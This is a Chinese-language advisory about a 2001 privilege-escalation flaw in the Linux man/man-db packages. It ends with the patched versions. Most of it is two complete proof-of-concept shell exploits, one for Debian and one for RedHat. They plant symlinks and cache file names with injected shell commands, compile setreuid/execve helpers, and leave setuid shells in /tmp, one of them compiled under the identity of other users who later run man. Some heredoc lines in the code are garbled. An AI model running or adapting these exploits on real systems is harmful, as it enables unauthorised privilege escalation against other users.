涉及程序:
man-db
描述:
本地用户利用 man 漏洞取得系统特权
详细:
近日发现 LINUX 的 man 软件包存在漏洞,在某些情况下,MAN 允许用户自定义 MAN 寻找 MAN 帮助页的路径,但 MAN 根据用户提供的路径打开了帮助页后,却没有丢掉其特权,这可能导致:
1、在 debian's man-db (<= 2.3.17-3.2, 2.3.16-3) 系统上,用户能得到 'man' 的 setuid shell
2、在 RedHat's man (<= man-1.5h1-20) 系统上,用户能执行任意代码,包括得到 root 的 shell
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
#!/bin/sh
###################################################
# Fri Jun 1 23:00:10 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-db 2.3.16-3,2.3.17-3.2 #
# #
# tested on: #
# debian2.2 -> instant man suidshell #
# #
# by jenggo #
# #
# thanx to: echo, mayonaise all @ #karet #
# ==> Mr.dur,amien,mega,akbar ... damai,damai ;) #
###################################################
TMPDIR=/tmp/mywork
RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man
echo "copying needed files ..."
if [ ! -x /usr/bin/groff ] [ ! -x /usr/bin/grotty ] [ ! -x /usr/bin/troff ] [ ! -x /usr/bin/gcc ]; then
echo "Failed, I need executable : groff,grotty,troff,gcc"
echo "cleaning up ..."
/bin/rm -rf $TMPDIR
fi
/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR
echo "compiling helper ..."
/bin/cat > $TMPDIR/hehe.c <#include
int main()
{
char *aa[2]={"/bin/sh", NULL};
setreuid(6,6);
execve(aa[0], aa, NULL);
exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null
/bin/cat > $TMPDIR/mandeb.c <#include
int main()
{
seteuid(6);
setuid(6);
system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
system("/bin/chown man /tmp/huhu");
system("/bin/chmod 4755 /tmp/huhu");
exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null
echo "making our manpage ..."
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
/bin/echo "bebas euy"/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null
echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin
echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork
echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp
if [ -u /tmp/huhu ]; then
echo "file /tmp/huhu is setuid. Hope it's owned by man"
echo "Have a nice day"
echo "[----- jenggo -----]"
/tmp/huhu
else
echo "exploit failed, cleaning up our binary ..."
fi
echo "cleaning up our preparation step dir ..."
/bin/rm -rf /tmp/$TMPDIR
#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-1.5h1-20 #
# #
# tested on: #
# redhat7.1 -> any user suidshell #
# #
# by jenggo #
# #
# thanx to: echo, mayonaise all @ #karet #
###################################################
# hmmm ... ada yang bisa modif jadi instant root ??
# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"
# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"
GZ="/bin/gzip"
echo -n "check man dir ..."
if [ ! -d $CACHEDIR ]; then
if [ -d $CACHEDIR2 ]; then
CACHEDIR=$CACHEDIR2
echo "OK"
else
echo "FAILED"
echo "check your man dir"
exit
fi
else
echo "OK"
fi
echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
if [ -d /usr/lib/man-db ]; then
echo "FAILED"
echo "I think this is debian style man, use other script"
else
echo "FAILED"
echo "can't find executables sgid man binary"
fi
exit
else
echo "OK"
fi
echo "making our man directory ..."
echo
mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine
echo "creating our man page ..."
echo
echo "BEBAS EUY"$GZ -c > /tmp/man/man1/huhuy.1.gz
echo "creating symlink ..."
echo
ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz
echo "creating our bogus command ..."
echo
touch /tmp/huhuy
echo "making manx shellscript"
echo
/bin/cat > /tmp/mine/manx <#!/bin/sh
export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`
/bin/cat >/tmp/mine/my"\$VICTIM".c <#include
void main()
{
char *hh[2]={"/bin/sh", NULL};
setreuid(\$VICTIM,\$VICTIM);
execve(hh[0], hh, NULL);
}
EOG
/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null
chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
EOF
chmod 755 /tmp/mine/manx
if [ ! -x /tmp/mine/manx ]; then
echo "file: /tmp/mine/manx can't be set executable !"
echo "fix the exploit first"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
exit
fi
echo "prepare to exploit ..."
echo
export PATH=../../../../../../tmp
cd /
echo "exploiting ..."
echo
/usr/bin/man -d huhuy 2>/dev/null
export PATH=/bin:/usr/bin
echo "checking our exploit result"
echo
if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
echo "content of $CACHEDIR/cat1:"
ls -l $CACHEDIR/cat1
echo
echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
echo "and your suidshells will be waiting at /tmp/mine/*
"
echo "bye."
echo "[-------- jenggo --------]"
echo
else
echo "hrrmm ... exploit failed to create offending file !"
echo "check again please"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi
解决方案:
建议用户采用 man-db 2.3.18-6 和 2.3.16-4
--------------------next---------------------
